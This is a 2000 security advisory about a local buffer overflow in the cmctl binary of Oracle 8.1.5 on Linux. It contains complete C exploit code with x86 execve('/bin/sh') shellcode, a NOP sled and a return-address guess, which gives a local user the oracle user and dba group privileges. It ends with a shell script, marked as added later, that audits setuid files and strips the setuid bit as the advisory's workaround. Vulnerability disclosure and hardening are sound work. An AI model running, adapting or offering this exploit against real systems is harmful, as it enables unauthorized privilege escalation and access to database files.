[ SOURCE: http://www.secureroot.com/security/advisories/9749177057.html ]

WWW.PLAZASITE.COM System & Security Division

Title:    Vulnerability in cmctl in Oracle 8.1.5
Date:     13-11-2000
Platform: Only tested on Linux, but can be ported to others.
Impact:   Any local user gains euid=oracle and egid=dba.
Author:   Juan Manuel Pascual (pask@plazasite.com)
Status:   Vendor contacted. Details below.

OVERVIEW:
cmctl is the Connection Manager Control binary.

PROBLEM SUMMARY:
There is a buffer overflow in cmctl that can be used by local users to obtain the euid of the oracle user and the egid of the dba group. With the default installation the oracle user owns all database files.

IMPACT:
Any user with local access can gain euid=oracle and egid=dba.

SOLUTION:
Maybe a chmod -s ;-)))).

STATUS:
Vendor was contacted 13/11. No answer was received in the last 4 days.

----------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba
pask@plazasite.com

/*
 * Exploit code for cmctl in Oracle 8.1.5 (8i) for Linux.
 *
 * I tested it on RH 6.2 and 6.1. It is possible to port it to other
 * platforms. If someone ports this to Sparc please tell me.
 *
 * Synopsis: buffer overflow in cmctl
 * Impact:   any user gains euid=oracle and egid=dba.
 *
 * Dedicated to the cmlc guys: juaroflin, oscar, ismak, blas, blackbas
 * and others. Thanks for your patience and time.
 * Special thanks to my favourite DBA, Xavi "honestly, what are you like" Morales.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET      1
#define DEFAULT_BUFFER_SIZE 350
#define NOP                 0x90
/* cmctl is started through the shell so that $pakito is expanded into
 * an argument of the "echo" command; the argument is what overflows. */
#define BINARY "/usr/local/oracle8i/app/oracle/product/8.1.5/bin/cmctl echo $pakito"

/* Linux/x86 execve("/bin/sh") shellcode */
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Returns the current stack pointer; relies on gcc/x86-32 returning
 * whatever is left in %eax. */
unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
    int i;

    if (argc > 1)
        offset = atoi(argv[1]);
    else {
        printf("Use ./cmctl_start Offset\n");
        exit(1);
    }

    buff = malloc(bsize);
    if (buff == NULL) {
        perror("malloc");
        exit(1);
    }

    /* Guessed return address: a little below our own stack pointer. */
    addr = get_sp() - offset;

    /* Fill the whole buffer with the return address... */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i += 4)
        *(addr_ptr++) = addr;

    /* ...then a NOP sled in the first half... */
    for (i = 0; i < bsize / 2; i++)
        buff[i] = NOP;

    /* ...and the shellcode centred in the buffer. */
    ptr = buff + ((bsize / 2) - (strlen(shellcode) / 2));
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    buff[bsize - 1] = '\0';

    /* Hand the payload to cmctl via the environment, expanded by the shell. */
    setenv("pakito", buff, 1);
    system(BINARY);
    return 0;
}

--
" In God We trust, Others We monitor "
-------------------------------------------------------------
Juan Manuel Pascual Escribá
Systems Administrator
PlazaSite S.A.
c/ Tomás Bretón 32-38
08950 Esplugues de Llobregat (Barcelona), SPAIN
Ph: +34 93 3717398  Fax: +34 93 3711968  mob: 667591142
Email: pask@plazasite.com
-------------------------------------------------------------
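The workaround the advisory offers is to strip the setuid bit from cmctl. The following audit helper is added here and is not part of the advisory or of Oracle's tooling: it lists every setuid/setgid file under an Oracle bin directory and, on request, applies the chmod -s workaround, printing the mode before and after. The default directory is the one the exploit above targets; the ORACLE_BIN variable and the report/fix interface are assumptions of this example.

```shell
#!/bin/sh
# Added example, not from the advisory: audit and optionally strip
# setuid/setgid bits under an Oracle installation (the "chmod -s" workaround).
# Default path is the install the exploit targets; override with ORACLE_BIN.
ORACLE_BIN="${ORACLE_BIN:-/usr/local/oracle8i/app/oracle/product/8.1.5/bin}"

# Print every regular file under $1 carrying the setuid (4000) or setgid (2000) bit.
list_setuid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# Number of files list_setuid reports, as a bare integer (0 for none).
count_setuid() {
    list_setuid "$1" | awk 'END { print NR }'
}

# Strip setuid/setgid from each reported file, showing the mode change.
strip_setuid() {
    list_setuid "$1" | while read -r f; do
        before=$(ls -l "$f" | cut -c1-10)
        chmod -s "$f"
        after=$(ls -l "$f" | cut -c1-10)
        echo "$f: $before -> $after"
    done
}

# Stand-alone use: ./audit_setuid.sh report|fix [DIR]
if [ -n "$1" ]; then
    case "$1" in
        report) list_setuid "${2:-$ORACLE_BIN}" ;;
        fix)    strip_setuid "${2:-$ORACLE_BIN}" ;;
        *)      echo "usage: $0 report|fix [dir]" >&2; exit 2 ;;
    esac
fi
```

Run `report` first so the set of privileged binaries is known before `fix` changes anything; any Oracle tool that genuinely needs setuid will stop working for non-oracle users once the bit is gone.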